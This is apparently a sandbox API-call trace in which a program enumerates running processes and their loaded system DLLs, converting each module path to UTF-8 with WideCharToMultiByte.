	[0105.808] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\SspiCli.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\SspiCli.dll", lpUsedDefaultChar=0x0) returned 32
	[0105.808] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SspiCli.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SspiCli.dll", lpUsedDefaultChar=0x0) returned 12
	[0105.808] Module32NextW (hSnapshot=0x804, lpme=0x20af280) returned 1
	[0105.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll", lpUsedDefaultChar=0x0) returned 34
	[0105.809] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CRYPTBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CRYPTBASE.dll", lpUsedDefaultChar=0x0) returned 14
	[0105.809] Module32NextW (hSnapshot=0x804, lpme=0x20af280) returned 1
	[0105.810] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\bcryptPrimitives.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\bcryptPrimitives.dll", lpUsedDefaultChar=0x0) returned 41
	[0105.810] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bcryptPrimitives.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bcryptPrimitives.dll", lpUsedDefaultChar=0x0) returned 21
	[0105.810] Module32NextW (hSnapshot=0x804, lpme=0x20af280) returned 1
	[0105.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\sechost.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\sechost.dll", lpUsedDefaultChar=0x0) returned 32
	[0105.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sechost.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sechost.dll", lpUsedDefaultChar=0x0) returned 12
	[0105.811] Module32NextW (hSnapshot=0x804, lpme=0x20af280) returned 1
	[0105.812] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\MSCTF.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\MSCTF.dll", lpUsedDefaultChar=0x0) returned 30
	[0105.812] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSCTF.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSCTF.dll", lpUsedDefaultChar=0x0) returned 10
	[0105.812] Module32NextW (hSnapshot=0x804, lpme=0x20af280) returned 1
	[0105.813] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\dwmapi.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\dwmapi.dll", lpUsedDefaultChar=0x0) returned 31
	[0105.813] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dwmapi.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwmapi.dll", lpUsedDefaultChar=0x0) returned 11
	[0105.813] Module32NextW (hSnapshot=0x804, lpme=0x20af280) returned 0
	[0105.813] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 8
	[0105.814] Process32NextW (in: hSnapshot=0x7e4, lppe=0x20af710 | out: lppe=0x20af710*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gently budapest.exe")) returned 1
	[0105.814] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0xeb8) returned 0x848
	[0105.826] Module32FirstW (hSnapshot=0x848, lpme=0x20af280) returned 1
	[0105.826] Module32NextW (hSnapshot=0x848, lpme=0x20af280) returned 1
	[0105.827] Module32NextW (hSnapshot=0x848, lpme=0x20af280) returned 1
	[0105.828] Module32NextW (hSnapshot=0x848, lpme=0x20af280) returned 1
	[0105.829] Module32NextW (hSnapshot=0x848, lpme=0x20af280) returned 1
	[0105.830] Module32NextW (hSnapshot=0x848, lpme=0x20af280) returned 1
	[0105.847] Module32NextW (hSnapshot=0x848, lpme=0x20af280) returned 1
	[0105.848] Module32NextW (hSnapshot=0x848, lpme=0x20af280) returned 1
	[0105.849] Module32NextW (hSnapshot=0x848, lpme=0x20af280) returned 1
	[0105.850] Module32NextW (hSnapshot=0x848, lpme=0x20af280) returned 1
	[0105.851] Module32NextW (hSnapshot=0x848, lpme=0x20af280) returned 1
	[0105.852] Module32NextW (hSnapshot=0x848, lpme=0x20af280) returned 1
	[0105.853] Module32NextW (hSnapshot=0x848, lpme=0x20af280) returned 1
	[0105.854] Module32NextW (hSnapshot=0x848, lpme=0x20af280) returned 1
	[0105.854] Module32NextW (hSnapshot=0x848, lpme=0x20af280) returned 1
	[0105.855] Module32NextW (hSnapshot=0x848, lpme=0x20af280) returned 1
	[0105.856] Module32NextW (hSnapshot=0x848, lpme=0x20af280) returned 1
	[0105.857] Module32NextW (hSnapshot=0x848, lpme=0x20af280) returned 1
	[0105.857] Module32NextW (hSnapshot=0x848, lpme=0x20af280) returned 0
	[0105.858] Module32FirstW (hSnapshot=0x848, lpme=0x20af280) returned 1
	[0105.859] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Internet Explorer\\gently budapest.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Internet Explorer\\gently budapest.exe", lpUsedDefaultChar=0x0) returned 55
	[0105.859] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 20
	[0105.859] Module32NextW (hSnapshot=0x848, lpme=0x20af280) returned 1
	[0105.860] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\ntdll.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\ntdll.dll", lpUsedDefaultChar=0x0) returned 30
	[0105.860] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ntdll.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ntdll.dll", lpUsedDefaultChar=0x0) returned 10
	[0105.860] Module32NextW (hSnapshot=0x848, lpme=0x20af280) returned 1
	[0105.861] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\KERNEL32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\KERNEL32.DLL", lpUsedDefaultChar=0x0) returned 33
	[0105.861] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="KERNEL32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KERNEL32.DLL", lpUsedDefaultChar=0x0) returned 13
	[0105.861] Module32NextW (hSnapshot=0x848, lpme=0x20af280) returned 1
	[0105.862] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\KERNELBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\KERNELBASE.dll", lpUsedDefaultChar=0x0) returned 35
	[0105.862] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="KERNELBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KERNELBASE.dll", lpUsedDefaultChar=0x0) returned 15
	[0105.862] Module32NextW (hSnapshot=0x848, lpme=0x20af280) returned 1
	[0105.862] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\apphelp.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\apphelp.dll", lpUsedDefaultChar=0x0) returned 32
	[0105.863] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="apphelp.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="apphelp.dll", lpUsedDefaultChar=0x0) returned 12
	[0105.863] Module32NextW (hSnapshot=0x848, lpme=0x20af280) returned 1
	[0105.863] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\USER32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\USER32.dll", lpUsedDefaultChar=0x0) returned 31
	[0105.863] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="USER32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USER32.dll", lpUsedDefaultChar=0x0) returned 11
	[0105.863] Module32NextW (hSnapshot=0x848, lpme=0x20af280) returned 1
	[0105.864] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\GDI32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\GDI32.dll", lpUsedDefaultChar=0x0) returned 30
	[0105.864] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GDI32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GDI32.dll", lpUsedDefaultChar=0x0) returned 10
	[0105.864] Module32NextW (hSnapshot=0x848, lpme=0x20af280) returned 1
	[0105.865] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\IMM32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\IMM32.DLL", lpUsedDefaultChar=0x0) returned 30
	[0105.865] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IMM32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IMM32.DLL", lpUsedDefaultChar=0x0) returned 10
	[0105.865] Module32NextW (hSnapshot=0x848, lpme=0x20af280) returned 1
	[0105.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\uxtheme.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\uxtheme.dll", lpUsedDefaultChar=0x0) returned 32
	[0105.866] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="uxtheme.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uxtheme.dll", lpUsedDefaultChar=0x0) returned 12
	[0105.866] Module32NextW (hSnapshot=0x848, lpme=0x20af280) returned 1
	[0105.867] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\msvcrt.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\msvcrt.dll", lpUsedDefaultChar=0x0) returned 31
	[0105.867] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcrt.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msvcrt.dll", lpUsedDefaultChar=0x0) returned 11
	[0105.867] Module32NextW (hSnapshot=0x848, lpme=0x20af280) returned 1
	[0105.867] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\combase.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\combase.dll", lpUsedDefaultChar=0x0) returned 32
	[0105.867] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="combase.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="combase.dll", lpUsedDefaultChar=0x0) returned 12
	[0105.867] Module32NextW (hSnapshot=0x848, lpme=0x20af280) returned 1
	[0105.868] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\RPCRT4.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\RPCRT4.dll", lpUsedDefaultChar=0x0) returned 31
	[0105.868] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RPCRT4.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RPCRT4.dll", lpUsedDefaultChar=0x0) returned 11
	[0105.868] Module32NextW (hSnapshot=0x848, lpme=0x20af280) returned 1
	[0105.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\SspiCli.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\SspiCli.dll", lpUsedDefaultChar=0x0) returned 32
	[0105.869] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SspiCli.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SspiCli.dll", lpUsedDefaultChar=0x0) returned 12
	[0105.869] Module32NextW (hSnapshot=0x848, lpme=0x20af280) returned 1
	[0105.870] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll", lpUsedDefaultChar=0x0) returned 34
	[0105.870] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CRYPTBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CRYPTBASE.dll", lpUsedDefaultChar=0x0) returned 14
	[0105.870] Module32NextW (hSnapshot=0x848, lpme=0x20af280) returned 1
	[0105.871] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\bcryptPrimitives.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\bcryptPrimitives.dll", lpUsedDefaultChar=0x0) returned 41
	[0105.871] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bcryptPrimitives.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bcryptPrimitives.dll", lpUsedDefaultChar=0x0) returned 21
	[0105.871] Module32NextW (hSnapshot=0x848, lpme=0x20af280) returned 1
	[0105.872] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\sechost.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\sechost.dll", lpUsedDefaultChar=0x0) returned 32
	[0105.872] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sechost.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sechost.dll", lpUsedDefaultChar=0x0) returned 12
	[0105.872] Module32NextW (hSnapshot=0x848, lpme=0x20af280) returned 1
	[0105.872] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\MSCTF.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\MSCTF.dll", lpUsedDefaultChar=0x0) returned 30
	[0105.873] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSCTF.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSCTF.dll", lpUsedDefaultChar=0x0) returned 10
	[0105.873] Module32NextW (hSnapshot=0x848, lpme=0x20af280) returned 1
	[0105.873] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\dwmapi.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\dwmapi.dll", lpUsedDefaultChar=0x0) returned 31
	[0105.873] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dwmapi.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwmapi.dll", lpUsedDefaultChar=0x0) returned 11
	[0105.873] Module32NextW (hSnapshot=0x848, lpme=0x20af280) returned 0
	[0105.874] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 20
	[0105.874] Process32NextW (in: hSnapshot=0x7e4, lppe=0x20af710 | out: lppe=0x20af710*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thoroughlypriestprefix.exe")) returned 1
	[0105.875] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0xecc) returned 0x84c
	[0105.896] Module32FirstW (hSnapshot=0x84c, lpme=0x20af280) returned 1
	[0105.897] Module32NextW (hSnapshot=0x84c, lpme=0x20af280) returned 1
	[0105.898] Module32NextW (hSnapshot=0x84c, lpme=0x20af280) returned 1
	[0105.898] Module32NextW (hSnapshot=0x84c, lpme=0x20af280) returned 1
	[0105.899] Module32NextW (hSnapshot=0x84c, lpme=0x20af280) returned 1
	[0105.900] Module32NextW (hSnapshot=0x84c, lpme=0x20af280) returned 1
	[0105.901] Module32NextW (hSnapshot=0x84c, lpme=0x20af280) returned 1
	[0105.902] Module32NextW (hSnapshot=0x84c, lpme=0x20af280) returned 1
	[0105.902] Module32NextW (hSnapshot=0x84c, lpme=0x20af280) returned 1
	[0105.907] Module32NextW (hSnapshot=0x84c, lpme=0x20af280) returned 1
	[0105.907] Module32NextW (hSnapshot=0x84c, lpme=0x20af280) returned 1
	[0105.908] Module32NextW (hSnapshot=0x84c, lpme=0x20af280) returned 1
	[0105.909] Module32NextW (hSnapshot=0x84c, lpme=0x20af280) returned 1
	[0105.910] Module32NextW (hSnapshot=0x84c, lpme=0x20af280) returned 1
	[0105.910] Module32NextW (hSnapshot=0x84c, lpme=0x20af280) returned 1
	[0105.911] Module32NextW (hSnapshot=0x84c, lpme=0x20af280) returned 1
	[0105.912] Module32NextW (hSnapshot=0x84c, lpme=0x20af280) returned 1
	[0105.913] Module32NextW (hSnapshot=0x84c, lpme=0x20af280) returned 1
	[0105.914] Module32NextW (hSnapshot=0x84c, lpme=0x20af280) returned 0
	[0105.914] Module32FirstW (hSnapshot=0x84c, lpme=0x20af280) returned 1
	[0105.916] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Program Files (x86)\\Windows Sidebar\\thoroughlypriestprefix.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files (x86)\\Windows Sidebar\\thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 66
	[0105.916] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 27
	[0105.916] Module32NextW (hSnapshot=0x84c, lpme=0x20af280) returned 1
	[0105.917] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\ntdll.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\ntdll.dll", lpUsedDefaultChar=0x0) returned 30
	[0105.917] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ntdll.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ntdll.dll", lpUsedDefaultChar=0x0) returned 10
	[0105.917] Module32NextW (hSnapshot=0x84c, lpme=0x20af280) returned 1
	[0105.918] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\KERNEL32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\KERNEL32.DLL", lpUsedDefaultChar=0x0) returned 33
	[0105.918] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="KERNEL32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KERNEL32.DLL", lpUsedDefaultChar=0x0) returned 13
	[0105.918] Module32NextW (hSnapshot=0x84c, lpme=0x20af280) returned 1
	[0105.918] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\KERNELBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\KERNELBASE.dll", lpUsedDefaultChar=0x0) returned 35
	[0105.918] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="KERNELBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KERNELBASE.dll", lpUsedDefaultChar=0x0) returned 15
	[0105.918] Module32NextW (hSnapshot=0x84c, lpme=0x20af280) returned 1
	[0105.919] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\apphelp.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\apphelp.dll", lpUsedDefaultChar=0x0) returned 32
	[0105.919] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="apphelp.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="apphelp.dll", lpUsedDefaultChar=0x0) returned 12
	[0105.919] Module32NextW (hSnapshot=0x84c, lpme=0x20af280) returned 1
	[0105.920] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\USER32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\USER32.dll", lpUsedDefaultChar=0x0) returned 31
	[0105.920] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="USER32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USER32.dll", lpUsedDefaultChar=0x0) returned 11
	[0105.920] Module32NextW (hSnapshot=0x84c, lpme=0x20af280) returned 1
